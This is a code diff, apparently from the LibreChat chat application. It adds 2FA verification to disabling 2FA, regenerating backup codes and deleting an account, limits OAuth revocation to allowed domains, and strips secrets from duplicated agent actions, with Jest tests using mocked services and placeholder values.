const user = await getUserById(userId, '_id totpSecret backupCodes'); const user = await getUserById(userId, '+totpSecret +backupCodes _id twoFactorEnabled');
if (!user || !user.totpSecret) { if (!user || !user.totpSecret) {
return res.status(400).json({ message: '2FA is not setup for this user' }); return res.status(400).json({ message: '2FA is not setup for this user' });
} }
if (user.twoFactorEnabled) { if (user.twoFactorEnabled) {
const secret = await getTOTPSecret(user.totpSecret); const result = await verifyOTPOrBackupCode({ user, token, backupCode });
let isVerified = false;
if (token) { if (!result.verified) {
isVerified = await verifyTOTP(secret, token); const msg = result.message ?? 'Either token or backup code is required to disable 2FA';
} else if (backupCode) { return res.status(result.status ?? 400).json({ message: msg });
isVerified = await verifyBackupCode({ user, backupCode });
} else {
return res
.status(400)
.json({ message: 'Either token or backup code is required to disable 2FA' });
}
if (!isVerified) {
return res.status(401).json({ message: 'Invalid token or backup code' });
} }
} }
await updateUser(userId, { totpSecret: null, backupCodes: [], twoFactorEnabled: false }); await updateUser(userId, {
totpSecret: null,
backupCodes: [],
twoFactorEnabled: false,
pendingTotpSecret: null,
pendingBackupCodes: [],
});
return res.status(200).json(); return res.status(200).json();
} catch (err) { } catch (err) {
logger.error('[disable2FA]', err); logger.error('[disable2FA]', err);
@ -138,10 +167,28 @@ const disable2FA = async (req, res) => {
/** /**
* Regenerate backup codes for the user. * Regenerate backup codes for the user.
* Requires OTP or backup code verification if 2FA is already enabled.
*/ */
const regenerateBackupCodes = async (req, res) => { const regenerateBackupCodes = async (req, res) => {
try { try {
const userId = req.user.id; const userId = req.user.id;
const user = await getUserById(userId, '+totpSecret +backupCodes _id twoFactorEnabled');
if (!user) {
return res.status(404).json({ message: 'User not found' });
}
if (user.twoFactorEnabled) {
const { token, backupCode } = req.body;
const result = await verifyOTPOrBackupCode({ user, token, backupCode });
if (!result.verified) {
const msg =
result.message ?? 'TOTP token or backup code is required to regenerate backup codes';
return res.status(result.status ?? 400).json({ message: msg });
}
}
const { plainCodes, codeObjects } = await generateBackupCodes(); const { plainCodes, codeObjects } = await generateBackupCodes();
await updateUser(userId, { backupCodes: codeObjects }); await updateUser(userId, { backupCodes: codeObjects });
return res.status(200).json({ return res.status(200).json({

View file

@ -14,6 +14,7 @@ const {
deleteMessages, deleteMessages,
deletePresets, deletePresets,
deleteUserKey, deleteUserKey,
getUserById,
deleteConvos, deleteConvos,
deleteFiles, deleteFiles,
updateUser, updateUser,
@ -34,6 +35,7 @@ const {
User, User,
} = require('~/db/models'); } = require('~/db/models');
const { updateUserPluginAuth, deleteUserPluginAuth } = require('~/server/services/PluginService'); const { updateUserPluginAuth, deleteUserPluginAuth } = require('~/server/services/PluginService');
const { verifyOTPOrBackupCode } = require('~/server/services/twoFactorService');
const { verifyEmail, resendVerificationEmail } = require('~/server/services/AuthService'); const { verifyEmail, resendVerificationEmail } = require('~/server/services/AuthService');
const { getMCPManager, getFlowStateManager, getMCPServersRegistry } = require('~/config'); const { getMCPManager, getFlowStateManager, getMCPServersRegistry } = require('~/config');
const { invalidateCachedTools } = require('~/server/services/Config/getCachedTools'); const { invalidateCachedTools } = require('~/server/services/Config/getCachedTools');
@ -241,6 +243,22 @@ const deleteUserController = async (req, res) => {
const { user } = req; const { user } = req;
try { try {
const existingUser = await getUserById(
user.id,
'+totpSecret +backupCodes _id twoFactorEnabled',
);
if (existingUser && existingUser.twoFactorEnabled) {
const { token, backupCode } = req.body;
const result = await verifyOTPOrBackupCode({ user: existingUser, token, backupCode });
if (!result.verified) {
const msg =
result.message ??
'TOTP token or backup code is required to delete account with 2FA enabled';
return res.status(result.status ?? 400).json({ message: msg });
}
}
await deleteMessages({ user: user.id }); // delete user messages await deleteMessages({ user: user.id }); // delete user messages
await deleteAllUserSessions({ userId: user.id }); // delete user sessions await deleteAllUserSessions({ userId: user.id }); // delete user sessions
await Transaction.deleteMany({ user: user.id }); // delete user transactions await Transaction.deleteMany({ user: user.id }); // delete user transactions
@ -352,6 +370,7 @@ const maybeUninstallOAuthMCP = async (userId, pluginKey, appConfig) => {
serverConfig.oauth?.revocation_endpoint_auth_methods_supported ?? serverConfig.oauth?.revocation_endpoint_auth_methods_supported ??
clientMetadata.revocation_endpoint_auth_methods_supported; clientMetadata.revocation_endpoint_auth_methods_supported;
const oauthHeaders = serverConfig.oauth_headers ?? {}; const oauthHeaders = serverConfig.oauth_headers ?? {};
const allowedDomains = getMCPServersRegistry().getAllowedDomains();
if (tokens?.access_token) { if (tokens?.access_token) {
try { try {
@ -367,6 +386,7 @@ const maybeUninstallOAuthMCP = async (userId, pluginKey, appConfig) => {
revocationEndpointAuthMethodsSupported, revocationEndpointAuthMethodsSupported,
}, },
oauthHeaders, oauthHeaders,
allowedDomains,
); );
} catch (error) { } catch (error) {
logger.error(`Error revoking OAuth access token for ${serverName}:`, error); logger.error(`Error revoking OAuth access token for ${serverName}:`, error);
@ -387,6 +407,7 @@ const maybeUninstallOAuthMCP = async (userId, pluginKey, appConfig) => {
revocationEndpointAuthMethodsSupported, revocationEndpointAuthMethodsSupported,
}, },
oauthHeaders, oauthHeaders,
allowedDomains,
); );
} catch (error) { } catch (error) {
logger.error(`Error revoking OAuth refresh token for ${serverName}:`, error); logger.error(`Error revoking OAuth refresh token for ${serverName}:`, error);

View file

@ -0,0 +1,264 @@
const mockGetUserById = jest.fn();
const mockUpdateUser = jest.fn();
const mockVerifyOTPOrBackupCode = jest.fn();
const mockGenerateTOTPSecret = jest.fn();
const mockGenerateBackupCodes = jest.fn();
const mockEncryptV3 = jest.fn();
jest.mock('@librechat/data-schemas', () => ({
encryptV3: (...args) => mockEncryptV3(...args),
logger: { error: jest.fn() },
}));
jest.mock('~/server/services/twoFactorService', () => ({
verifyOTPOrBackupCode: (...args) => mockVerifyOTPOrBackupCode(...args),
generateBackupCodes: (...args) => mockGenerateBackupCodes(...args),
generateTOTPSecret: (...args) => mockGenerateTOTPSecret(...args),
verifyBackupCode: jest.fn(),
getTOTPSecret: jest.fn(),
verifyTOTP: jest.fn(),
}));
jest.mock('~/models', () => ({
getUserById: (...args) => mockGetUserById(...args),
updateUser: (...args) => mockUpdateUser(...args),
}));
const { enable2FA, regenerateBackupCodes } = require('~/server/controllers/TwoFactorController');
function createRes() {
const res = {};
res.status = jest.fn().mockReturnValue(res);
res.json = jest.fn().mockReturnValue(res);
return res;
}
const PLAIN_CODES = ['code1', 'code2', 'code3'];
const CODE_OBJECTS = [
{ codeHash: 'h1', used: false, usedAt: null },
{ codeHash: 'h2', used: false, usedAt: null },
{ codeHash: 'h3', used: false, usedAt: null },
];
beforeEach(() => {
jest.clearAllMocks();
mockGenerateTOTPSecret.mockReturnValue('NEWSECRET');
mockGenerateBackupCodes.mockResolvedValue({ plainCodes: PLAIN_CODES, codeObjects: CODE_OBJECTS });
mockEncryptV3.mockReturnValue('encrypted-secret');
});
describe('enable2FA', () => {
it('allows first-time setup without token — writes to pending fields', async () => {
const req = { user: { id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({ _id: 'user1', twoFactorEnabled: false, email: 'a@b.com' });
mockUpdateUser.mockResolvedValue({ email: 'a@b.com' });
await enable2FA(req, res);
expect(res.status).toHaveBeenCalledWith(200);
expect(res.json).toHaveBeenCalledWith(
expect.objectContaining({ otpauthUrl: expect.any(String), backupCodes: PLAIN_CODES }),
);
expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled();
const updateCall = mockUpdateUser.mock.calls[0][1];
expect(updateCall).toHaveProperty('pendingTotpSecret', 'encrypted-secret');
expect(updateCall).toHaveProperty('pendingBackupCodes', CODE_OBJECTS);
expect(updateCall).not.toHaveProperty('twoFactorEnabled');
expect(updateCall).not.toHaveProperty('totpSecret');
expect(updateCall).not.toHaveProperty('backupCodes');
});
it('re-enrollment writes to pending fields, leaving live 2FA intact', async () => {
const req = { user: { id: 'user1' }, body: { token: '123456' } };
const res = createRes();
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
email: 'a@b.com',
};
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
mockUpdateUser.mockResolvedValue({ email: 'a@b.com' });
await enable2FA(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
user: existingUser,
token: '123456',
backupCode: undefined,
persistBackupUse: false,
});
expect(res.status).toHaveBeenCalledWith(200);
const updateCall = mockUpdateUser.mock.calls[0][1];
expect(updateCall).toHaveProperty('pendingTotpSecret', 'encrypted-secret');
expect(updateCall).toHaveProperty('pendingBackupCodes', CODE_OBJECTS);
expect(updateCall).not.toHaveProperty('twoFactorEnabled');
expect(updateCall).not.toHaveProperty('totpSecret');
});
it('allows re-enrollment with valid backup code (persistBackupUse: false)', async () => {
const req = { user: { id: 'user1' }, body: { backupCode: 'backup123' } };
const res = createRes();
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
email: 'a@b.com',
};
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
mockUpdateUser.mockResolvedValue({ email: 'a@b.com' });
await enable2FA(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith(
expect.objectContaining({ persistBackupUse: false }),
);
expect(res.status).toHaveBeenCalledWith(200);
});
it('returns error when no token provided and 2FA is enabled', async () => {
const req = { user: { id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 });
await enable2FA(req, res);
expect(res.status).toHaveBeenCalledWith(400);
expect(mockUpdateUser).not.toHaveBeenCalled();
});
it('returns 401 when invalid token provided and 2FA is enabled', async () => {
const req = { user: { id: 'user1' }, body: { token: 'wrong' } };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({
verified: false,
status: 401,
message: 'Invalid token or backup code',
});
await enable2FA(req, res);
expect(res.status).toHaveBeenCalledWith(401);
expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' });
expect(mockUpdateUser).not.toHaveBeenCalled();
});
});
describe('regenerateBackupCodes', () => {
it('returns 404 when user not found', async () => {
const req = { user: { id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue(null);
await regenerateBackupCodes(req, res);
expect(res.status).toHaveBeenCalledWith(404);
expect(res.json).toHaveBeenCalledWith({ message: 'User not found' });
});
it('requires OTP when 2FA is enabled', async () => {
const req = { user: { id: 'user1' }, body: { token: '123456' } };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
mockUpdateUser.mockResolvedValue({});
await regenerateBackupCodes(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(200);
expect(res.json).toHaveBeenCalledWith({
backupCodes: PLAIN_CODES,
backupCodesHash: CODE_OBJECTS,
});
});
it('returns error when no token provided and 2FA is enabled', async () => {
const req = { user: { id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 });
await regenerateBackupCodes(req, res);
expect(res.status).toHaveBeenCalledWith(400);
});
it('returns 401 when invalid token provided and 2FA is enabled', async () => {
const req = { user: { id: 'user1' }, body: { token: 'wrong' } };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({
verified: false,
status: 401,
message: 'Invalid token or backup code',
});
await regenerateBackupCodes(req, res);
expect(res.status).toHaveBeenCalledWith(401);
expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' });
});
it('includes backupCodesHash in response', async () => {
const req = { user: { id: 'user1' }, body: { token: '123456' } };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
mockUpdateUser.mockResolvedValue({});
await regenerateBackupCodes(req, res);
const responseBody = res.json.mock.calls[0][0];
expect(responseBody).toHaveProperty('backupCodesHash', CODE_OBJECTS);
expect(responseBody).toHaveProperty('backupCodes', PLAIN_CODES);
});
it('allows regeneration without token when 2FA is not enabled', async () => {
const req = { user: { id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: false,
});
mockUpdateUser.mockResolvedValue({});
await regenerateBackupCodes(req, res);
expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(200);
expect(res.json).toHaveBeenCalledWith({
backupCodes: PLAIN_CODES,
backupCodesHash: CODE_OBJECTS,
});
});
});

View file

@ -0,0 +1,302 @@
const mockGetUserById = jest.fn();
const mockDeleteMessages = jest.fn();
const mockDeleteAllUserSessions = jest.fn();
const mockDeleteUserById = jest.fn();
const mockDeleteAllSharedLinks = jest.fn();
const mockDeletePresets = jest.fn();
const mockDeleteUserKey = jest.fn();
const mockDeleteConvos = jest.fn();
const mockDeleteFiles = jest.fn();
const mockGetFiles = jest.fn();
const mockUpdateUserPlugins = jest.fn();
const mockUpdateUser = jest.fn();
const mockFindToken = jest.fn();
const mockVerifyOTPOrBackupCode = jest.fn();
const mockDeleteUserPluginAuth = jest.fn();
const mockProcessDeleteRequest = jest.fn();
const mockDeleteToolCalls = jest.fn();
const mockDeleteUserAgents = jest.fn();
const mockDeleteUserPrompts = jest.fn();
jest.mock('@librechat/data-schemas', () => ({
logger: { error: jest.fn(), info: jest.fn() },
webSearchKeys: [],
}));
jest.mock('librechat-data-provider', () => ({
Tools: {},
CacheKeys: {},
Constants: { mcp_delimiter: '::', mcp_prefix: 'mcp_' },
FileSources: {},
}));
jest.mock('@librechat/api', () => ({
MCPOAuthHandler: {},
MCPTokenStorage: {},
normalizeHttpError: jest.fn(),
extractWebSearchEnvVars: jest.fn(),
}));
jest.mock('~/models', () => ({
deleteAllUserSessions: (...args) => mockDeleteAllUserSessions(...args),
deleteAllSharedLinks: (...args) => mockDeleteAllSharedLinks(...args),
updateUserPlugins: (...args) => mockUpdateUserPlugins(...args),
deleteUserById: (...args) => mockDeleteUserById(...args),
deleteMessages: (...args) => mockDeleteMessages(...args),
deletePresets: (...args) => mockDeletePresets(...args),
deleteUserKey: (...args) => mockDeleteUserKey(...args),
getUserById: (...args) => mockGetUserById(...args),
deleteConvos: (...args) => mockDeleteConvos(...args),
deleteFiles: (...args) => mockDeleteFiles(...args),
updateUser: (...args) => mockUpdateUser(...args),
findToken: (...args) => mockFindToken(...args),
getFiles: (...args) => mockGetFiles(...args),
}));
jest.mock('~/db/models', () => ({
ConversationTag: { deleteMany: jest.fn() },
AgentApiKey: { deleteMany: jest.fn() },
Transaction: { deleteMany: jest.fn() },
MemoryEntry: { deleteMany: jest.fn() },
Assistant: { deleteMany: jest.fn() },
AclEntry: { deleteMany: jest.fn() },
Balance: { deleteMany: jest.fn() },
Action: { deleteMany: jest.fn() },
Group: { updateMany: jest.fn() },
Token: { deleteMany: jest.fn() },
User: {},
}));
jest.mock('~/server/services/PluginService', () => ({
updateUserPluginAuth: jest.fn(),
deleteUserPluginAuth: (...args) => mockDeleteUserPluginAuth(...args),
}));
jest.mock('~/server/services/twoFactorService', () => ({
verifyOTPOrBackupCode: (...args) => mockVerifyOTPOrBackupCode(...args),
}));
jest.mock('~/server/services/AuthService', () => ({
verifyEmail: jest.fn(),
resendVerificationEmail: jest.fn(),
}));
jest.mock('~/config', () => ({
getMCPManager: jest.fn(),
getFlowStateManager: jest.fn(),
getMCPServersRegistry: jest.fn(),
}));
jest.mock('~/server/services/Config/getCachedTools', () => ({
invalidateCachedTools: jest.fn(),
}));
jest.mock('~/server/services/Files/S3/crud', () => ({
needsRefresh: jest.fn(),
getNewS3URL: jest.fn(),
}));
jest.mock('~/server/services/Files/process', () => ({
processDeleteRequest: (...args) => mockProcessDeleteRequest(...args),
}));
jest.mock('~/server/services/Config', () => ({
getAppConfig: jest.fn(),
}));
jest.mock('~/models/ToolCall', () => ({
deleteToolCalls: (...args) => mockDeleteToolCalls(...args),
}));
jest.mock('~/models/Prompt', () => ({
deleteUserPrompts: (...args) => mockDeleteUserPrompts(...args),
}));
jest.mock('~/models/Agent', () => ({
deleteUserAgents: (...args) => mockDeleteUserAgents(...args),
}));
jest.mock('~/cache', () => ({
getLogStores: jest.fn(),
}));
const { deleteUserController } = require('~/server/controllers/UserController');
function createRes() {
const res = {};
res.status = jest.fn().mockReturnValue(res);
res.json = jest.fn().mockReturnValue(res);
res.send = jest.fn().mockReturnValue(res);
return res;
}
function stubDeletionMocks() {
mockDeleteMessages.mockResolvedValue();
mockDeleteAllUserSessions.mockResolvedValue();
mockDeleteUserKey.mockResolvedValue();
mockDeletePresets.mockResolvedValue();
mockDeleteConvos.mockResolvedValue();
mockDeleteUserPluginAuth.mockResolvedValue();
mockDeleteUserById.mockResolvedValue();
mockDeleteAllSharedLinks.mockResolvedValue();
mockGetFiles.mockResolvedValue([]);
mockProcessDeleteRequest.mockResolvedValue();
mockDeleteFiles.mockResolvedValue();
mockDeleteToolCalls.mockResolvedValue();
mockDeleteUserAgents.mockResolvedValue();
mockDeleteUserPrompts.mockResolvedValue();
}
beforeEach(() => {
jest.clearAllMocks();
stubDeletionMocks();
});
describe('deleteUserController - 2FA enforcement', () => {
it('proceeds with deletion when 2FA is not enabled', async () => {
const req = { user: { id: 'user1', _id: 'user1', email: 'a@b.com' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({ _id: 'user1', twoFactorEnabled: false });
await deleteUserController(req, res);
expect(res.status).toHaveBeenCalledWith(200);
expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' });
expect(mockDeleteMessages).toHaveBeenCalled();
expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled();
});
it('proceeds with deletion when user has no 2FA record', async () => {
const req = { user: { id: 'user1', _id: 'user1', email: 'a@b.com' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue(null);
await deleteUserController(req, res);
expect(res.status).toHaveBeenCalledWith(200);
expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' });
});
it('returns error when 2FA is enabled and verification fails with 400', async () => {
const req = { user: { id: 'user1', _id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 });
await deleteUserController(req, res);
expect(res.status).toHaveBeenCalledWith(400);
expect(mockDeleteMessages).not.toHaveBeenCalled();
});
it('returns 401 when 2FA is enabled and invalid TOTP token provided', async () => {
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
};
const req = { user: { id: 'user1', _id: 'user1' }, body: { token: 'wrong' } };
const res = createRes();
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({
verified: false,
status: 401,
message: 'Invalid token or backup code',
});
await deleteUserController(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
user: existingUser,
token: 'wrong',
backupCode: undefined,
});
expect(res.status).toHaveBeenCalledWith(401);
expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' });
expect(mockDeleteMessages).not.toHaveBeenCalled();
});
it('returns 401 when 2FA is enabled and invalid backup code provided', async () => {
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
backupCodes: [],
};
const req = { user: { id: 'user1', _id: 'user1' }, body: { backupCode: 'bad-code' } };
const res = createRes();
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({
verified: false,
status: 401,
message: 'Invalid token or backup code',
});
await deleteUserController(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
user: existingUser,
token: undefined,
backupCode: 'bad-code',
});
expect(res.status).toHaveBeenCalledWith(401);
expect(mockDeleteMessages).not.toHaveBeenCalled();
});
it('deletes account when valid TOTP token provided with 2FA enabled', async () => {
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
};
const req = {
user: { id: 'user1', _id: 'user1', email: 'a@b.com' },
body: { token: '123456' },
};
const res = createRes();
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
await deleteUserController(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
user: existingUser,
token: '123456',
backupCode: undefined,
});
expect(res.status).toHaveBeenCalledWith(200);
expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' });
expect(mockDeleteMessages).toHaveBeenCalled();
});
it('deletes account when valid backup code provided with 2FA enabled', async () => {
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
backupCodes: [{ codeHash: 'h1', used: false }],
};
const req = {
user: { id: 'user1', _id: 'user1', email: 'a@b.com' },
body: { backupCode: 'valid-code' },
};
const res = createRes();
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
await deleteUserController(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
user: existingUser,
token: undefined,
backupCode: 'valid-code',
});
expect(res.status).toHaveBeenCalledWith(200);
expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' });
expect(mockDeleteMessages).toHaveBeenCalled();
});
});

View file

@ -0,0 +1,159 @@
jest.mock('~/server/services/PermissionService', () => ({
findPubliclyAccessibleResources: jest.fn(),
findAccessibleResources: jest.fn(),
hasPublicPermission: jest.fn(),
grantPermission: jest.fn().mockResolvedValue({}),
}));
jest.mock('~/server/services/Config', () => ({
getCachedTools: jest.fn(),
getMCPServerTools: jest.fn(),
}));
const mongoose = require('mongoose');
const { actionDelimiter } = require('librechat-data-provider');
const { agentSchema, actionSchema } = require('@librechat/data-schemas');
const { MongoMemoryServer } = require('mongodb-memory-server');
const { duplicateAgent } = require('../v1');
let mongoServer;
beforeAll(async () => {
mongoServer = await MongoMemoryServer.create();
const mongoUri = mongoServer.getUri();
if (!mongoose.models.Agent) {
mongoose.model('Agent', agentSchema);
}
if (!mongoose.models.Action) {
mongoose.model('Action', actionSchema);
}
await mongoose.connect(mongoUri);
}, 20000);
afterAll(async () => {
await mongoose.disconnect();
await mongoServer.stop();
});
beforeEach(async () => {
await mongoose.models.Agent.deleteMany({});
await mongoose.models.Action.deleteMany({});
});
describe('duplicateAgentHandler — action domain extraction', () => {
it('builds duplicated action entries using metadata.domain, not action_id', async () => {
const userId = new mongoose.Types.ObjectId();
const originalAgentId = `agent_original`;
const agent = await mongoose.models.Agent.create({
id: originalAgentId,
name: 'Test Agent',
author: userId.toString(),
provider: 'openai',
model: 'gpt-4',
tools: [],
actions: [`api.example.com${actionDelimiter}act_original`],
versions: [{ name: 'Test Agent', createdAt: new Date(), updatedAt: new Date() }],
});
await mongoose.models.Action.create({
user: userId,
action_id: 'act_original',
agent_id: originalAgentId,
metadata: { domain: 'api.example.com' },
});
const req = {
params: { id: agent.id },
user: { id: userId.toString() },
};
const res = {
status: jest.fn().mockReturnThis(),
json: jest.fn(),
};
await duplicateAgent(req, res);
expect(res.status).toHaveBeenCalledWith(201);
const { agent: newAgent, actions: newActions } = res.json.mock.calls[0][0];
expect(newAgent.id).not.toBe(originalAgentId);
expect(String(newAgent.author)).toBe(userId.toString());
expect(newActions).toHaveLength(1);
expect(newActions[0].metadata.domain).toBe('api.example.com');
expect(newActions[0].agent_id).toBe(newAgent.id);
for (const actionEntry of newAgent.actions) {
const [domain, actionId] = actionEntry.split(actionDelimiter);
expect(domain).toBe('api.example.com');
expect(actionId).toBeTruthy();
expect(actionId).not.toBe('act_original');
}
const allActions = await mongoose.models.Action.find({}).lean();
expect(allActions).toHaveLength(2);
const originalAction = allActions.find((a) => a.action_id === 'act_original');
expect(originalAction.agent_id).toBe(originalAgentId);
const duplicatedAction = allActions.find((a) => a.action_id !== 'act_original');
expect(duplicatedAction.agent_id).toBe(newAgent.id);
expect(duplicatedAction.metadata.domain).toBe('api.example.com');
});
it('strips sensitive metadata fields from duplicated actions', async () => {
const userId = new mongoose.Types.ObjectId();
const originalAgentId = 'agent_sensitive';
await mongoose.models.Agent.create({
id: originalAgentId,
name: 'Sensitive Agent',
author: userId.toString(),
provider: 'openai',
model: 'gpt-4',
tools: [],
actions: [`secure.api.com${actionDelimiter}act_secret`],
versions: [{ name: 'Sensitive Agent', createdAt: new Date(), updatedAt: new Date() }],
});
await mongoose.models.Action.create({
user: userId,
action_id: 'act_secret',
agent_id: originalAgentId,
metadata: {
domain: 'secure.api.com',
api_key: 'sk-secret-key-12345',
oauth_client_id: 'client_id_xyz',
oauth_client_secret: 'client_secret_xyz',
},
});
const req = {
params: { id: originalAgentId },
user: { id: userId.toString() },
};
const res = {
status: jest.fn().mockReturnThis(),
json: jest.fn(),
};
await duplicateAgent(req, res);
expect(res.status).toHaveBeenCalledWith(201);
const duplicatedAction = await mongoose.models.Action.findOne({
agent_id: { $ne: originalAgentId },
}).lean();
expect(duplicatedAction.metadata.domain).toBe('secure.api.com');
expect(duplicatedAction.metadata.api_key).toBeUndefined();
expect(duplicatedAction.metadata.oauth_client_id).toBeUndefined();
expect(duplicatedAction.metadata.oauth_client_secret).toBeUndefined();
const originalAction = await mongoose.models.Action.findOne({
action_id: 'act_secret',
}).lean();
expect(originalAction.metadata.api_key).toBe('sk-secret-key-12345');
});
});

View file

@ -44,6 +44,7 @@ const {
isEphemeralAgentId, isEphemeralAgentId,
removeNullishValues, removeNullishValues,
} = require('librechat-data-provider'); } = require('librechat-data-provider');
const { filterFilesByAgentAccess } = require('~/server/services/Files/permissions');
const { spendTokens, spendStructuredTokens } = require('~/models/spendTokens'); const { spendTokens, spendStructuredTokens } = require('~/models/spendTokens');
const { encodeAndFormat } = require('~/server/services/Files/images/encode'); const { encodeAndFormat } = require('~/server/services/Files/images/encode');
const { updateBalance, bulkInsertTransactions } = require('~/models'); const { updateBalance, bulkInsertTransactions } = require('~/models');
@ -479,6 +480,7 @@ class AgentClient extends BaseClient {
getUserKeyValues: db.getUserKeyValues, getUserKeyValues: db.getUserKeyValues,
getToolFilesByIds: db.getToolFilesByIds, getToolFilesByIds: db.getToolFilesByIds,
getCodeGeneratedFiles: db.getCodeGeneratedFiles, getCodeGeneratedFiles: db.getCodeGeneratedFiles,
filterFilesByAgentAccess,
}, },
); );
@ -1172,7 +1174,11 @@ class AgentClient extends BaseClient {
} }
} }
/** Anthropic Claude models use a distinct BPE tokenizer; all others default to o200k_base. */
getEncoding() { getEncoding() {
if (this.model && this.model.toLowerCase().includes('claude')) {
return 'claude';
}
return 'o200k_base'; return 'o200k_base';
} }

View file

@ -0,0 +1,677 @@
const mongoose = require('mongoose');
const { v4: uuidv4 } = require('uuid');
const { Constants } = require('librechat-data-provider');
const { agentSchema } = require('@librechat/data-schemas');
const { MongoMemoryServer } = require('mongodb-memory-server');
const d = Constants.mcp_delimiter;
const mockGetAllServerConfigs = jest.fn();
jest.mock('~/server/services/Config', () => ({
getCachedTools: jest.fn().mockResolvedValue({
web_search: true,
execute_code: true,
file_search: true,
}),
}));
jest.mock('~/config', () => ({
getMCPServersRegistry: jest.fn(() => ({
getAllServerConfigs: mockGetAllServerConfigs,
})),
}));
jest.mock('~/models/Project', () => ({
getProjectByName: jest.fn().mockResolvedValue(null),
}));
jest.mock('~/server/services/Files/strategies', () => ({
getStrategyFunctions: jest.fn(),
}));
jest.mock('~/server/services/Files/images/avatar', () => ({
resizeAvatar: jest.fn(),
}));
jest.mock('~/server/services/Files/S3/crud', () => ({
refreshS3Url: jest.fn(),
}));
jest.mock('~/server/services/Files/process', () => ({
filterFile: jest.fn(),
}));
jest.mock('~/models/Action', () => ({
updateAction: jest.fn(),
getActions: jest.fn().mockResolvedValue([]),
}));
jest.mock('~/models/File', () => ({
deleteFileByFilter: jest.fn(),
}));
jest.mock('~/server/services/PermissionService', () => ({
findAccessibleResources: jest.fn().mockResolvedValue([]),
findPubliclyAccessibleResources: jest.fn().mockResolvedValue([]),
grantPermission: jest.fn(),
hasPublicPermission: jest.fn().mockResolvedValue(false),
checkPermission: jest.fn().mockResolvedValue(true),
}));
jest.mock('~/models', () => ({
getCategoriesWithCounts: jest.fn(),
}));
jest.mock('~/cache', () => ({
getLogStores: jest.fn(() => ({
get: jest.fn(),
set: jest.fn(),
delete: jest.fn(),
})),
}));
const {
filterAuthorizedTools,
createAgent: createAgentHandler,
updateAgent: updateAgentHandler,
duplicateAgent: duplicateAgentHandler,
revertAgentVersion: revertAgentVersionHandler,
} = require('./v1');
const { getMCPServersRegistry } = require('~/config');
let Agent;
describe('MCP Tool Authorization', () => {
let mongoServer;
let mockReq;
let mockRes;
beforeAll(async () => {
mongoServer = await MongoMemoryServer.create();
const mongoUri = mongoServer.getUri();
await mongoose.connect(mongoUri);
Agent = mongoose.models.Agent || mongoose.model('Agent', agentSchema);
}, 20000);
afterAll(async () => {
await mongoose.disconnect();
await mongoServer.stop();
});
beforeEach(async () => {
await Agent.deleteMany({});
jest.clearAllMocks();
getMCPServersRegistry.mockImplementation(() => ({
